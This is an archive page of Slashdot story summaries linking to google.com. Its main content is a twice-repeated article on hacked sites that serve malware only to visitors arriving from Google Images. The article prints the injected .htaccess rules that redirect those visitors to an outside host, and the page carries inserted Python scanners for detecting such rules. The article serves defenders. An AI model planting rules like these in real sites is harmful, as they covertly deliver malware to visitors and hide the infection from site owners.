Domain: google.com
Stories and comments across the archive that link to google.com.
Stories · 3,747
-
PayPal Freezes Cryptome's Account
grimwell sends in the news that after Cryptome's little run-in with Microsoft and NetSol, the activist site has now had its funds frozen by PayPal. Cryptome founder John Young notes, "Google lists thousands of instances of this asymmetrical high-handedness." "We have reviewed your PayPal Account, and due to the excessive risk involved, we would like to begin parting ways in a manner that is least disruptive to your business." -
Google Indexing In Near-Realtime
krou writes "ReadWriteWeb is covering Google's embrace of a system that would enable any Web publisher to 'automatically submit new content to Google for indexing within seconds of that content being published.' Google's Brett Slatkin is lead developer of PuSH, or PubSubHubbub, a real-time syndication protocol based on ATOM, where 'a publisher tells the world about a Hub that it will notify every time new content is published.' Subscribers then wait for the hub to notify them of the new content. Says RWW: 'If Google can implement an Indexing by PuSH program, it would ask every website to implement the technology and declare which Hub they push to at the top of each document, just like they declare where the RSS feeds they publish can be found. Then Google would subscribe to those PuSH feeds to discover new content when it's published. PuSH wouldn't likely replace crawling, in fact a crawl would be needed to discover PuSH feeds to subscribe to, but the real-time format would be used to augment Google's existing index.' PuSH is an open protocol, and Slatkin says that 'I am being told by my engineering bosses to openly promote this open approach even to our competitors.'" -
Military Operation Canceled Because of Facebook Update
Churam writes "The Israeli military had to cancel an operation (translated from the original French) because a soldier had given some operational details on Facebook. From the article: 'An artillery soldier who was involved in this operation — the arrest of Palestinian suspects — Facebook announced on the imminence of it. "Wednesday, we're cleaning Katana and Thursday, God willing We return to the house," wrote the soldier on his Facebook page, referring to a village near Ramallah.'" -
SCO Zombie McBride's New Plan For World Litigation
eldavojohn writes "Years after you thought it was all over, Groklaw is reporting that Darl McBride (ex-CEO of SCO) has formed a new company that is buying SCO's mobile business for peanuts — but he's also going to get 'certain Intellectual Property' with the deal. You may recall that McBride was the brains behind the Linux lawsuits that SCO launched and it appears he may be orchestrating an exit route where he escapes with some IP intact, in order to wreak havoc once again. Hopefully this is the part at the end of the movie where the zombie comes back to life one last time only to have the hero deliver the final final blow. When this news broke upon the investment world, SCO's stock skyrocketed a blistering 11%, bringing it up seven cents to a full seventy cents — a level which it has not achieved since 2007." -
The LHC Is Back Online
medea and several other readers noted that the LHC came back online early this morning. Here is the tweet from CERN announcing the milestone. As we discussed a few weeks ago, CERN plans to run the LHC at half power or less through 2011. -
EU Says Google Street View Violates Privacy
upto0013 notes the latest spot of trouble for Google in Europe: the EU says that Google's Street View images violate privacy laws. The EU's privacy watchdog asked Google to notify cities and towns before photographing (Google says it does this already) and to delete original photos after 6 months (Google keeps them for a year and says it has reason to do so). "[The privacy official] said that the company should revise its 'disproportionate' policy of keeping the original unblurred images for up to a year, saying improvements in Google's blurring technology and better public awareness would lead to fewer complaints — and a shorter delay for people to react to the photos they see on the site. Complaints about the images put online would usually be checked against the original photos." -
Quake 3 For Android
An anonymous reader writes "Over the last two months I ported Quake 3 to Android as a hobby project. It only took a few days to get the game working. More time was spent on tweaking the game experience. Right now the game runs at 25fps on a Motorola Milestone/Droid. 'Normally when you compile C/C++ code using the Android NDK, the compiler targets a generic ARMv5 CPU which uses software floating-point. Without any optimizations and audio Quake 3 runs at 22fps. Since Quake 3 uses a lot of floating-point calculations, I tried a better C-compiler (GCC 4.4.0 from Android GIT) which supports modern CPUs and Neon SIMD instructions. Quake 3 optimized for Cortex-A8 with Neon is about 15% faster without audio and 35% with audio compared to the generic ARMv5 build. Most likely the performance improvement compared to the ARMv5 build is not that big because the system libraries of the Milestone have been compiled with FPU support, so sin/cos/log/.. take advantage of the FPU.'" -
Google To Restart Talks With China
eldavojohn writes "Following the infamous attacks allegedly carried out by the Chinese government, Google sent a strongly worded message to China. However, despite the show of plumage, Google.cn continues to operate filtered. While both parties are silent about any resolution, Google and China have planned to restart talks and negotiations over Google operating unfiltered in China. (If you have a subscription, you can read about the story from its original source, the Wall Street Journal.) The print edition of the WSJ names Google policy executive Ross LaJeunesse as their representative meeting with Chinese officials. Meanwhile, China's Foreign Ministry spokesman, Qin Gang, has officially rejected the claim that the attacks were sanctioned by the Chinese government. He said, 'Google's statement from January 12 is groundless, and we are firmly opposed to it. China administers its internet according to law, and this position will not change. China prohibits hacking and will crack down on hacking according to law.'" -
USPTO's 1-Click Indecisiveness Enters 5th Year
theodp writes "When it comes to Amazon CEO Jeff Bezos' 1-Click patent, the USPTO is an agency that just can't say no. Or yes. It's now been 4+ years since actor Peter Calveley submitted prior art that triggered a USPTO reexamination of the 1-Click patent. Still no 'final answer' from the USPTO, although an Examiner recently issued yet another Final Rejection of 1-Click related claims (pdf), admonishing Amazon for making him 'sift through hundreds of submitted references to identify what applicant allegedly has already submitted,' which he complained is 'adding an undue burden' to his workload. Looks like Bezos' 2000 pledge of 'less work for the overworked Patent and Trademark Office' isn't working out so well in practice. Not too surprising — after all, Amazon did inform Congress that it 'has modified its specific [patent] reform proposals from the year 2000.'" -
iPhone's Liquid Sensors Can Be Triggered By Wintertime Use
An anonymous reader writes "The Polish website Moje Jabluszko ran an experiment that proves the poor reliability of the liquid contact indicators (original, in Polish) installed by Apple in the iPhone. They performed three different tests to challenge the LCIs, which they recorded as a movie. They decided to mimic regular usage of the iPhone — meaning, you go outside where it could be cold or warm, then move inside in a building where temperature might be dramatically different, but still within covered conditions. So, they placed the iPhone in its box for one hour outside at -11 C, then moved it inside at room temperature for 24 hours. They repeated the experiment 3 times, and after the third cycle they could show that the LCI located in the audio jack plug started turning red! This is a clear proof that LCIs are not reliable and could turn red while the iPhone has been used under the defined environmental requirements defined by Apple. Here, only the condensing water could have been in contact with the sensor. In other words, even moving in and out during regular winter time will make your iPhone LCI turn red!" (In the tech specs for the iPhone, Apple rates the non-operating temperature range as -20 to 45 C.) -
Google Donates $2 Million To the Wikimedia Foundation
k33l0r writes "Yesterday, the Wikimedia Foundation, which runs Wikipedia and other projects, announced that it has received a $2 million donation from Google. This is the first time that Google has supported Wikipedia, and it has many wondering why. Anyone remember Knol, Google's answer to Wikipedia?" -
Google, Apple Call Workers' Race & Gender Trade Secrets
theodp writes "The Mercury News reports that Google, whose stated mission is to make the world's information universally accessible, says the race and gender of its work force is a trade secret that cannot be released. So do Apple, Yahoo, Oracle, and Applied Materials. The five companies waged a successful 18-month FOIA battle with the Merc, convincing federal regulators who collect the data that its release would cause 'commercial harm' by potentially revealing the companies' business strategy to competitors. Law professor John Sims called the objections — the details of which the Dept. of Labor declined to share — 'absurd.' Many industry peers see the issue differently — Intel, Cisco, eBay, AMD, Sanmina, and Sun agreed to allow the DOL to provide the requested info. 'There's nothing to hide, in our view,' said a spokesman for Intel. Some observers note it's not the first time Google has declined to put a number on its vaunted diversity — in earlier Congressional testimony, Google's top HR exec dodged the question of how many African-American employees the company had." -
Tour de France Champion Accused of Hacking
ub3r n3u7r4l1st writes "A French judge has issued a national arrest warrant for US cyclist Floyd Landis in connection with a case of data hacking at a doping laboratory, a prosecutor's office said. French judge Thomas Cassuto is seeking to question Landis about computer hacking dating back to September 2006 at the Chatenay-Malabry lab, said Astrid Granoux, spokeswoman for Nanterre's prosecutor's office. The laboratory near Paris had uncovered abnormally elevated testosterone levels in Landis' samples collected in the run-up to his 2006 Tour de France victory, leading to the eventual loss of his medal." -
Using a Sausage On Your iPhone
Weemz writes "This is the best use of a sausage and technology I have seen today. From the article: 'Too cold to take your gloves off? No problem, try a frozen, individually wrapped Hot Dog. Seoul, Korea; CJ Corporation's "Max Rod" sales are soaring as Koreans have discovered that they are quite effective for operating iPhones in cold weather. Max Rods are individually wrapped, frozen sausages that have replaced the need for an iPhone stylus or iPhone gloves. Once back indoors, this handy stylus becomes a not so light snack! Funnier than watching a subway car of people tapping their iPhones with frozen meat-sticks is reading the Google translation of the original news article.'" -
Google Considered Too Big To Fail
theodp writes "Doc Searls is worried about the way Google makes money. 'Nearly all of it comes from advertising,' he frets. 'That's what pays for all the infrastructure Google is giving to the rest of us. As our dependency on Google verges on the absolute, this should be a concern.' Have we reached Peak Advertising? Blogger Dave Winer says amen, asking if Google is already 'too big to fail.'" -
Google To Challenge Facebook Again
Hugh Pickens writes "Google is set to make a fresh attempt to gain a foothold in the booming social networking business, seeking to counter the growing threat that Facebook poses to some of its core services. USA Today reports that the search giant is upgrading Gmail to add social-media tools similar to those found on Facebook, including photo and video sharing within the Gmail application, along with a new tool for status updates. According to reports, Google is planning to give Gmail users a way to aggregate the updates of their various contacts on the service, creating a stream of notifications that would echo the similar real-time streams from Facebook and Twitter. Google's decision to exploit the heavily-used Gmail service as the basis for its latest assault on the social networking business partly reflects the failure of Google's previous stand-alone efforts to enter the social networking sector. Its Orkut networking service, though launched before Facebook, has failed to gain a mass following in most parts of the world, despite success in Brazil, and its acquisition of Twitter rival Jaiku ended in failure after it scrapped development of the service." Update: 02/09 19:32 GMT by KD : It's been announced as Google Buzz; CNET has a detailed writeup. -
Google Reduces Its Nexus One Termination Fee
CWmike writes "The only smartphone Linus Torvalds doesn't hate is that much less unlikable now that Google has quietly chopped $200 off its early termination fee on the Nexus One. Customers who cancel the service had been on the hook for $550, including a $350 Google cancellation charge. Google has reduced their fee to $150 — but users are still liable for a $200 ETF from T-Mobile. Users have a 14-day grace period during which they do not have to pay either charge, although they may be hit with a restocking fee. The $350 total fee matches one of the highest in the industry, charged by Verizon. Google did not announce the change but simply altered its online terms-of-service document." The price cut could add momentum to a phone that, by one reckoning, costs only $49 unlocked. -
Mozilla Puts Tiger Out To Pasture
Barence writes "Mozilla is ready to exorcise support for Mac OS X 10.4 from Firefox's development code, closing the door on Apple's aging OS. The foundation stopped supporting 10.4, codenamed Tiger, in September 2009, but, according to Josh Aas, a Mozilla platform engineer, 'we left much of the code required to support that platform in the tree in case we wanted to reverse that decision. We had come to a point where we need to make a final decision and either restore 10.4 support or remove this (large) amount of 10.4 specific code,' he notes on the Mozilla developer planning forum." -
USPTO To Review Controversial VoIP Patent
alphadogg writes "The US Patent and Trademark Office has agreed to review a controversial patent issued in 2001 that is claimed to cover much of the technology underlying VoIP. The patent, held by a small company called C2 Communications Technologies, is one of 10 that the Electronic Frontier Foundation has been trying to strike down for several years through its Patent Busting Project. On Friday, the patent office granted the EFF's request for a re-examination. The digital civil-liberties organization argued that another applicant had submitted basically some of the same technology to the patent office before C2 did. Patent No. 6,243,373, 'Method and apparatus for implementing a computer network/Internet telephone system,' is credited to David L. Turock as inventor and is owned by C2, previously called Acceris Communications Technologies." -
Image Searchers Snared By Malware
Slashdot frequent contributor Bennett Haselton writes "Sites that have been hacked by malware writers are now serving infected content only when the visitor views the site through a frame on Google Images. This recent twist on a standard trick used by malware writers makes it harder for webmasters and hosting companies to discover that their sites have been infected. Automated tools that check websites for infections and training procedures for hosting company abuse-department staffers will have to be updated accordingly." Read on for the rest of Bennett's thoughts.
A friend of mine recently e-mailed a discussion list with an interesting query. Stonewall Ballard had searched on "tradingbloxlogo" on Google Images, which led to the results on this page. Clicking on the first result, an image from the tradingblox.com site, took him to this page, with the Google information header at the top, and loading the http://www.tradingblox.com/tradingblox/courses.htm page in a frame in the bottom half of the browser window. When that page was loaded in that bottom frame, Internet Explorer and Firefox would both flash warnings about the page being infected with malware. But if you loaded the http://www.tradingblox.com/tradingblox/courses.htm page in a normal Web browser window by itself, the browser would not display any warning, and checking the site using Google's malware query form returned a result saying the site was not suspicious. Why the differing results?
It turned out that tradingblox.com had been hacked, and pages had been installed onto the server that would serve malware in an unusual way: If the page was being viewed in a frame loaded from Google Images, or as a result of a click-through from Google Images, then the page would serve content that attempted to infect the user's computer with malware. On the other hand, if the page was viewed normally (as a result of typing the page into your browser), the malware-loading code would not be served. That means if you were to telnet to port 80 on the www.tradingblox.com server, and request a page as follows:
GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com
then the normal page would be returned. But if you entered these commands:
GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com
Referer: http://images.google.com/
then you would get the malware-infected page. (The webmaster has since fixed the problem, so that the latter request will no longer get the malware code.) The webserver would only serve the infected content if "images.google.com" was sent specifically as the referrer; "www.google.com" by itself would not trigger the result.
(For the uninitiated, when you click a link from one page to another, for example if you were reading an article on CNN.com which had a link to http://www.google.com/support/ and you clicked on that link, then when your browser requested the file "/support/" from the www.google.com server, it would send the request as follows:
GET /support/ HTTP/1.1
Host: www.google.com
Referer: http://www.cnn.com/article.url.goes.here/
So the webmasters of www.google.com can see what links people are clicking from other websites to reach the www.google.com site. Many sites use this to track which links from other pages, including advertisements that they've bought on other sites, are sending them the most traffic.)
Denis Sinegubko, owner of the website malware-infection checking site UnmaskParasites.com, says that he had seen pages before which would serve infected content if www.google.com itself were listed in the Referer: field. However, this was the first instance he'd seen where the content was only served if images.google.com was specifically listed as the Referer. Since no malware distributor would manually break into just one website to compromise it in this exact manner, it's extremely likely that there are many more sites that are infected in the same way. Stonewall Ballard noted that the Google Safe Browsing lookup for the hosting company where tradingblox.com is hosted, showed a high number of other sites on the same network that had been infected recently. (And those are only the infected sites that Google knows about -- recall that Google didn't even know that tradingblox.com was infected.)
Obviously, from the malware author's point of view, the point of serving malware content only some of the time rather than all of the time, is to make it harder for webmasters to pinpoint the problem. Someone gets the malware warning after following a link or loading a page via Google Images, and sends the webmaster an e-mail saying, "I got infected by your webpage, here is the link." The webmaster views the link and says, "I don't know what you're talking about, there's no malware code on that page." It also makes it harder for automated site-checking tools to detect the infection. Google's Safe Browsing lookup tool reported the site as uninfected, and Sinegubko's site-checking tool on UnmaskParasites.com also reported no malware infections on tradingblox.com, even while the site was still infected. (Sinegubko said he would possibly modify his site-checking script so that in addition to the other checks it performs, it will attempt to request a page sending "http://images.google.com/" in the "Referer:" field, to see if that results in different content being served. Google's Safe Browsing spider should do the same.)
Sinegubko said he's also seen instances where hacked sites would cover their tracks even further, by refusing to display infected content if the Referer: link from Google contained "inurl:domainname.com" or "site:domainname.com". This is because webmasters would sometimes check if their site was serving infected content in response to a click from Google, by doing a Google search on their own domainname.com, and following the link back to their site. By not serving the infected content in that case, the malware infection becomes even harder to detect.
This also makes it harder to report the exploits to the hosting companies that host infected websites. In case the webmaster of the infected site doesn't respond to complaints that their site is infected, sometimes you have to contact the hosting company and ask them to forcibly take the website offline until the problem is fixed. And I have been hosted by several companies where the tech support and abuse departments were (just barely) competent enough that if I called them up and said, "Your customer is hosting a malware-infected webpage, go to this page and view the source code, and you can see the malicious code", they would have known what to do. But if I'd had to tell them to follow the steps above -- "telnet to port 80" on the infected website, and type a few lines to mimic the process of a browser sending HTTP request headers to the website -- I probably would have lost them at "telnet". (Recall an experiment wherein I e-mailed some hosting companies from a Hotmail account, asking them to change the nameservers for a domain that I had hosted with them, and about half of the hosting companies agreed to switch the domain nameservers -- essentially, transferring the entire website to an unknown third party -- without ever authenticating that it was really me writing from that Hotmail account. Which means anybody could have taken over those websites simply by sending an e-mail. Front-end tech support at cheap hosting companies is often not very smart.)
Fortunately, Tim Arnold, the webmaster of the tradingblox.com site, did respond to the original report about the malware-infected pages, and found that an intruder had hacked the site on November 30th and inserted these lines into an .htaccess file:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://search-box.in/in.cgi?4&parameter=u [R,L]
<Files 403.shtml>
order allow,deny
allow from all
</Files>
which resulted in the infected pages being served whenever a user loaded the site via Google Images. (So if you found this article because you think your own site might be infected by malware that serves pages conditionally on the Referer: field, that's the first place to look to fix the problem!)
It's uncertain how Arnold's site got infected in the first place, but Sinegubko had earlier said that almost 90% of break-ins in 2009 that occurred on Linux-hosted sites were caused by malware that was installed surreptitiously on people's Windows PCs and stole the passwords that people used to administer their sites. Or the site could have been compromised via a WordPress exploit such as this one. As I always tell anyone who will listen, if you want to keep your Linux-hosted website from being broken into, one of the most frequently overlooked precautions that you need to take is to keep your Windows PC free of spyware.
But the larger point is that as malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting company abuse departments to verify that a site has been hacked, as the hacks use more sophisticated techniques to prevent the infection from being discovered. Abuse report handlers will have to be trained to understand what it means that a website is only showing infected content as a result of a "Referer:" header, and ideally should know enough about networking and command-line tools, to be able to mimic the "telnet" instructions above. (Most expensive dedicated hosting companies like RackSpace, do have technical staff who are at least that knowledgeable. But cheap shared hosting companies -- the kind where you can get your domain transferred to another company by sending an e-mail from an unauthenticated Hotmail account -- will have to train their abuse staff better.) Automated site-checking tools like Google's Safe Browsing spider and UnmaskParasites.com's site checker will have to start taking these attacks into account when checking a site for infection.
And as always, keeping your PC free of spyware shouldn't be viewed just as a convenience to yourself, but as an obligation to your neighbors as well. (A case of the positive/negative externalities problem in economics.) You wouldn't send your kid to school with the flu, so why did you get your Mom on the Internet without buying her some anti-virus software?
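A defender's check for the kind of injected rules quoted above, as an added example that is not part of the original article: it scans .htaccess text for RewriteRule directives that are gated on %{HTTP_REFERER} and send the visitor to another host, while leaving ordinary hotlink protection alone. The function names, the sample rule sets, and the hosts redirect.example and mysite.example are constructed for illustration.

```python
import os
import re
from urllib.parse import urlsplit

# Constructed sample modelled on the injected rules quoted in the article.
# redirect.example is a placeholder host, not the one from the incident.
INFECTED = """RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://redirect.example/in.cgi?4&parameter=u [R,L]
"""

# Constructed sample: ordinary hotlink protection. It also tests the Referer,
# but it blocks the request ([F]) instead of redirecting to another site.
HOTLINK = """RewriteEngine On
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^https?://(www\\.)?mysite\\.example/ [NC]
RewriteRule \\.(gif|jpe?g|png)$ - [F,NC]
"""

DIRECTIVE = re.compile(r"^(RewriteCond|RewriteRule)\s+(.*)$", re.IGNORECASE)
ARGUMENT = re.compile(r'"(?:\\.|[^"\\])*"|\S+')  # bare or double-quoted argument


def _split_args(rest):
    """Split a directive's arguments, honouring double-quoted arguments."""
    args = []
    for arg in ARGUMENT.findall(rest):
        if len(arg) > 1 and arg[0] == '"' and arg[-1] == '"':
            arg = arg[1:-1]
        args.append(arg)
    return args


def find_referer_redirects(text, own_hosts=()):
    """Return RewriteRules that depend on the Referer and point off-site.

    own_hosts lists hostnames that belong to the site being checked, so that
    redirects to the site's own hosts are not reported.
    """
    own = {h.lower() for h in own_hosts}
    findings = []
    pending = []  # RewriteCond lines apply to the next RewriteRule only
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        match = DIRECTIVE.match(line)
        if not match:
            continue
        kind, args = match.group(1).lower(), _split_args(match.group(2))
        if kind == "rewritecond":
            if len(args) >= 2:
                pending.append((lineno, args[0], args[1]))
            continue
        conds, pending = pending, []
        if len(args) < 2:
            continue
        target = args[1]
        flags = args[2] if len(args) > 2 else ""
        host = ""
        if re.match(r"(?i)^https?://", target):
            host = urlsplit(target).hostname or ""
        referer_conds = [c for c in conds if "HTTP_REFERER" in c[1].upper()]
        if referer_conds and host and host not in own:
            findings.append({
                "rule_line": lineno,
                "target_host": host,
                "referer_patterns": [c[2] for c in referer_conds],
                "flags": flags,
            })
    return findings


def scan_tree(root, own_hosts=()):
    """Check every .htaccess file under root; return {path: findings}."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = find_referer_redirects(fh.read(), own_hosts)
            if found:
                hits[path] = found
    return hits


if __name__ == "__main__":
    for name, sample in (("infected", INFECTED), ("hotlink", HOTLINK)):
        print(name, find_referer_redirects(sample))
```

Because "RewriteOptions inherit" lets rules in a parent directory apply further down, scan_tree should be run from the document root rather than on a single directory.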
-
Image Searchers Snared By Malware
Slashdot frequent contributor Bennett Haselton writes "Sites that have been hacked by malware writers are now serving infected content only when the visitor views the site through a frame on Google Images. This recent twist on a standard trick used by malware writers, makes it harder for webmasters and hosting companies to discover that their sites have been infected. Automated tools that check websites for infections and training procedures for hosting company abuse-department staffers will have to be updated accordingly." Read on for the rest of Bennett's thoughts.A friend of mine recently e-mailed a discussion list with an interesting query. Stonewall Ballard had searched on "tradingbloxlogo" on Google Images, which led to the results on this page. Clicking on the first result, an image from the tradingblox.com site, took him to this page, with the Google information header at the top, and loading the http://www.tradingblox.com/tradingblox/courses.htm page in a frame in the bottom half of the browser window. When that page was loaded in that bottom frame, Internet Explorer and Firefox would both flash warnings about the page being infected with malware. But if you loaded the http://www.tradingblox.com/tradingblox/courses.htm page in a normal Web browser window by itself, the browser would not display any warning, and checking the site using Google's malware query form returned a result saying the site was not suspicious. Why the differing results?
It turned out that the tradingblox.com had been hacked, and pages had been installed onto the server that would serve malware in an unusual way: If the page was being viewed in a frame loaded from Google Images, or as as result of a click through from Google Images, then the page would serve content that attempted to infect the user's computer with malware. On the other hand, if the page was viewed normally (as a result of typing the page into your browser), the malware-loading code would not be served. That means if you were to telnet to port 80 on the www.tradingblox.com server, and request a page as follows:
GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.comthen the normal page would be returned. But if you entered these commands:
GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com
Referer: http://images.google.com/then you would get the malware-infected page. (The webmaster has since fixed the problem, so that the latter request will no longer get the malware code.) The webserver would only serve the infected content if "images.google.com" was sent specifically as the referrer; "www.google.com" by itself would not trigger the result.
(For the uninitiated, when you click a link from one page to another, for example if you were reading an article on CNN.com which had a link to http://www.google.com/support/ and you clicked on that link, then when your browser requested the file "/support/" from the www.google.com server, it would send the request as follows:
GET /support/ HTTP/1.1
Host: www.google.com
Referer: http://www.cnn.com/article.url.goes.here/So the webmasters of www.google.com can see what links people are clicking from other websites to reach the www.google.com site. Many sites use this to track which links from other pages, including advertisements that they've bought on other sites, are sending them the most traffic.)
Denis Sinegubko, owner of the website malware-infection checking site UnmaskParasites.com, says that he had seen pages before which would serve infected content if www.google.com itself were listed in the Referer: field. However, this was the first instance he'd seen where the content was only served if images.google.com was specifically listed as the Referer. Since no malware distributor would manually break into just one website to compromise it in this exact manner, it's extremely likely that there are many more sites that are infected in the same way. Stonewall Ballard noted that the Google Safe Browsing lookup for the hosting company where tradingblox.com is hosted, showed a high number of other sites on the same network that had been infected recently. (And those are only the infected sites that Google knows about -- recall that Google didn't even know that tradingblox.com was infected.)
Obviously, from the malware author's point of view, the point of serving malware content only some of the time rather than all of the time, is to make it harder for webmasters to pinpoint the problem. Someone gets the malware warning after following a link or loading a page via Google Images, and sends the webmaster an e-mail saying, "I got infected by your webpage, here is the link." The webmaster views the link and says, "I don't know what you're talking about, there's no malware code on that page." It also makes it harder for automated site-checking tools to detect the infection. Google's Safe Browsing lookup tool reported the site as uninfected, and Sinegubko's site-checking tool on UnmaskParasites.com also reported no malware infections on tradingblox.com, even while the site was still infected. (Sinegubko said he would possibly modify his site-checking script so that in addition to the other checks it performs, it will attempt to request a page sending "http://images.google.com/" in the "Referer:" field, to see if that results in different content being served. Google's Safe Browsing spider should do the same.)
Sinegubko said he's also seen instances where hacked sites would cover their tracks even further, by refusing to display infected content if the Referer: link from Google contained "inurl:domainname.com" or "site:domainname.com". This is because webmasters would sometimes check if their site was serving infected content in response to a click from Google, by doing a Google search on their own domainname.com, and following the link back to their site. By not serving the infected content in that case, the malware infection becomes even harder to detect.
This also makes it harder to report the exploits to the hosting companies that host infected websites. In case the webmaster of the infected site doesn't respond to complaints that their site is infected, sometimes you have to contact the hosting company and ask them to forcibly take the website offline until the problem is fixed. And I have been hosted by several companies where the tech support and abuse departments were (just barely) competent enough that if I called them up and said, "Your customer is hosting a malware-infected webpage, go to this page and view the source code, and you can see the malicious code", they would have known what to do. But if I'd had to tell them to follow the steps above -- "telnet to port 80" on the infected website, and type a few lines to mimic the process of a browser sending HTTP request headers to the website -- I probably would have lost them at "telnet". (Recall an experiment wherein I e-mailed some hosting companies from a Hotmail account, asking them to change the nameservers for a domain that I had hosted with them, and about half of the hosting companies agreed to switch the domain nameservers -- essentially, transferring the entire website to an unknown third party -- without ever authenticating that it was really me writing from that Hotmail account. Which means anybody could have taken over those websites simply by sending an e-mail. Front-end tech support at cheap hosting companies is often not very smart.)
Fortunately, Tim Arnold, the webmaster of the tradingblox.com site, did respond to the original report about the malware-infected pages, and found that an intruder had hacked the site on November 30th and inserted these lines into an .htaccess file:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://search-box.in/in.cgi?4&parameter=u [R,L]
<Files 403.shtml>
order allow,deny
allow from all
</Files>
which resulted in the infected pages being served whenever a user loaded the site via Google Images. (So if you found this article because you think your own site might be infected by malware that serves pages conditionally on the Referer: field, that's the first place to look to fix the problem!)
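A check for the pattern in the injected .htaccess lines above, as an added example (not code from the article or from UnmaskParasites.com): it flags any RewriteRule that redirects to a host outside the site's own when the RewriteCond lines in front of it test %{HTTP_REFERER}, and leaves ordinary hotlink protection alone. The function names, the own_hosts parameter, the severity labels and the example.org sample are assumptions made for the illustration.

```python
import re
from urllib.parse import urlsplit

# Sample 1: the injected rewrite lines as quoted in the article.
INJECTED = r"""
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://search-box.in/in.cgi?4&parameter=u [R,L]
"""

# Sample 2 (constructed): legitimate rules that also mention the Referer.
BENIGN = r"""
RewriteEngine On
# block image hotlinking from other sites
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^https?://(www\.)?example\.org/ [NC]
RewriteRule \.(gif|jpe?g|png)$ - [F,L]
RewriteCond %{HTTP_HOST} ^example\.org$ [NC]
RewriteRule ^(.*)$ http://www.example.org/$1 [R=301,L]
"""

TOKEN = re.compile(r'"(?:\\.|[^"\\])*"|\S+')


def logical_lines(text):
    """Yield (line_number, directive) with comments dropped and
    backslash-continued lines joined, as Apache reads them."""
    buf, start = "", 0
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not buf:
            start = n
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        buf += line
        if buf.strip() and not buf.lstrip().startswith("#"):
            yield start, buf
        buf = ""


def split_args(line):
    """Split a directive into arguments, keeping quoted arguments whole."""
    out = []
    for tok in TOKEN.findall(line):
        if len(tok) > 1 and tok[0] == '"' and tok[-1] == '"':
            tok = tok[1:-1]
        out.append(tok)
    return out


def redirect_host(target):
    """Host of an absolute http(s) substitution, or '' for paths and '-'."""
    if not re.match(r"(?i)https?://", target):
        return ""
    try:
        return (urlsplit(target).hostname or "").lower()
    except ValueError:
        return ""


def scan_htaccess(text, own_hosts):
    """Return one finding per RewriteRule that sends Referer-selected
    visitors to a host not listed in own_hosts."""
    own = {h.lower() for h in own_hosts}
    findings, conds = [], []
    for lineno, line in logical_lines(text):
        args = split_args(line)
        if not args:
            continue
        name = args[0].lower()
        if name == "rewritecond" and len(args) >= 3:
            conds.append((args[1], args[2]))
        elif name == "rewriterule" and len(args) >= 3:
            patterns = [p for v, p in conds if "HTTP_REFERER" in v.upper()]
            host = redirect_host(args[2])
            if patterns and host and host not in own:
                # A positive match selects visitors arriving FROM a site;
                # negated tests ("!...") are what hotlink protection uses.
                positive = any(not p.startswith("!") for p in patterns)
                findings.append({
                    "line": lineno,
                    "redirect_host": host,
                    "referer_patterns": patterns,
                    "severity": "high" if positive else "review",
                })
            conds = []  # RewriteCond lines apply only to the next RewriteRule
    return findings


if __name__ == "__main__":
    for label, text, hosts in (
        ("injected", INJECTED, {"tradingblox.com", "www.tradingblox.com"}),
        ("benign", BENIGN, {"example.org", "www.example.org"}),
    ):
        print(label, scan_htaccess(text, hosts))
```

Run it over every .htaccess under the document root, since RewriteOptions inherit lets a file in a parent directory affect the directories below it.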
It's uncertain how Arnold's site got infected in the first place, but Sinegubko had earlier said that almost 90% of break-ins in 2009 that occurred on Linux-hosted sites were caused by malware installed surreptitiously on people's Windows PCs and stealing the passwords that people used to administer their sites. Or the site could have been compromised via a WordPress exploit such as this one. As I always tell anyone who will listen, if you want to keep your Linux-hosted website from being broken into, one of the most frequently overlooked precautions that you need to take is to keep your Windows PC free of spyware.
But the larger point is that as malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting company abuse departments to verify that a site has been hacked, as the hacks use more sophisticated techniques to prevent the infection from being discovered. Abuse report handlers will have to be trained to understand what it means that a website is only showing infected content as a result of a "Referer:" header, and ideally should know enough about networking and command-line tools to be able to mimic the "telnet" instructions above. (Most expensive dedicated hosting companies like RackSpace do have technical staff who are at least that knowledgeable. But cheap shared hosting companies -- the kind where you can get your domain transferred to another company by sending an e-mail from an unauthenticated Hotmail account -- will have to train their abuse staff better.) Automated site-checking tools like Google's Safe Browsing spider and UnmaskParasites.com's site checker will have to start taking these attacks into account when checking a site for infection.
And as always, keeping your PC free of spyware shouldn't be viewed just as a convenience to yourself, but as an obligation to your neighbors as well. (A case of the positive/negative externalities problem in economics.) You wouldn't send your kid to school with the flu, so why did you get your Mom on the Internet without buying her some anti-virus software?
-
Image Searchers Snared By Malware
